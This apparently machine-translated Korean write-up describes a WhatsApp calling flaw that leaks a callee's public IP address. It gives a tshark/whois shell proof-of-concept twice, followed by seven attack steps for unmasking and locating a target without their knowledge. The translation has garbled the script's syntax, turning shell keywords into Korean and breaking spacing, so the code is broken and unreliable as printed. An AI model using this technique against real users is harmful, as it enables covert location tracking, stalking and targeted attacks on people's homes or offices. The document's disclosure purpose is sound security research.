이 프로그램은 교육 목적만을위한 것입니다. 허가없이 사용하지 마십시오. 일반적인 면책 조항은 특히 나 (BHDRESH)가 이러한 프로그램에서 제공하는 정보 또는 기능의 직접적 또는 간접적 사용으로 인한 손해에 대해 책임을지지 않는다는 사실을 적용합니다. 저자 또는 인터넷 제공 업체는 이러한 프로그램이나 그 파생 상품의 내용이나 오용에 대한 책임이 없습니다. 이 프로그램을 사용함으로써 귀하는 이러한 프로그램의 사용으로 인한 손상 (데이터 소, 시스템 충돌, 시스템 타협 등)이 Bhdresh의 책임이 아니라는 사실을 받아들입니다.
마지막으로, 이것은 개인적인 발전입니다. 철학을 존중하고 나쁜 일을 위해 사용하지 마십시오!
https://vimeo.com/577355374
모든 플랫폼의 WhatsApp 응용 프로그램의 최신 버전은 원격 WhatsApp 사용자 공개 IP 공개에 취약합니다.
WhatsApp (음성 / 비디오) 호출 중에 발신자 측의 응용 프로그램은 수신자 장치의 공개 IP 주소와 직접 연결하려고합니다. 대상 호스트에서 Facebook 및 WhatsApp 서버 IP 주소를 필터링하면 지식없이 Target WhatsApp 사용자의 올바른 공개 IP 주소를 공개 할 수 있습니다.
다음은이 취약점을 이용하는 빠른 스크립트입니다.
#!/bin/sh
필터 = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Enter를 누르고 대상에게 전화하십시오."
읽기 라인
tshark -i eth0 -l -t 필드 -f "udp"-e ip.dst -y "$ filter"-y "ip.dst! = 192.168.0.0/16 및 ip.dst! = 10.0.0.0/8 및 ip.dst! = 172.16.0.0/12 "| 읽기 라인은 whois $ line> /tmp /b를 수행합니다
필터 = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
[ "$ 필터"-gt 0]; 그런 다음 TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi
WhatsApp 사용자를 공개 IP로 매핑 할 수있는 가능성은 WhatsApp 사용자의 위치 정보를 공개 할뿐만 아니라 위치 기록을 유지함으로써 신체 움직임을 추적하는 데 오용 할 수 있습니다. 사용자와 IP 정보 간의 직접적인 매핑은 사용자의 서핑 습관을 추적하고 영향을 미치기 위해 오용 될 수 있습니다.
또한, 공개 IP는 WhatsApp 사용자 홈 또는 사무실에 대한 대상 공격을 시작하도록 악용 될 수 있습니다.
사용자 : Usera는 userB의 WhatsApp 세부 사항이 있습니다
환경 : N/A.
브라우저 : N/A.
앱 버전 : <= 모든 플랫폼에서 WhatsApp 응용 프로그램의 최신 버전
OS : 웹을 제외한 모든 플랫폼
설명 : Usera는 whatsapp를 userb로 호출하고 userb의 지식없이 공개 IP 정보를 캡처합니다. 단계에 대한 이해를 높이기위한 비디오 POC : https://vimeo.com/577355374
1 단계 : 공격자 머신에서 Wi -Fi 핫스팟을 시작하고 공격자 전화를 공격자 SSID에 연결
2 단계 : 공격자 전화의 라우터 역할을하는 공격자 머신에서 POC 스크립트 (아래)를 시작합니다.
#!/bin/sh
필터 = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Enter를 누르고 대상에게 전화하십시오."
읽기 라인
tshark -i eth0 -l -t 필드 -f "udp"-e ip.dst -y "$ filter"-y "ip.dst! = 192.168.0.0/16 및 ip.dst! = 10.0.0.0/8 및 ip.dst! = 172.16.0.0/12 "| 읽기 라인은 whois $ line> /tmp /b를 수행합니다
필터 = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
[ "$ 필터"-gt 0]; 그런 다음 TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetInfo fi
3 단계 : WhatsApp 사용자를 무작위로 호출하여 서버 IP 주소를 필터링합니다.
4 단계 : WhatsApp에 피해자에게 전화하십시오
5 단계 : 일단 설립 된 통화를 분리하십시오
6 단계 : 스크립트는 대상의 공개 IP 주소를 공개합니다.
7 단계 : 대상 전화에서 공개 IP 주소 확인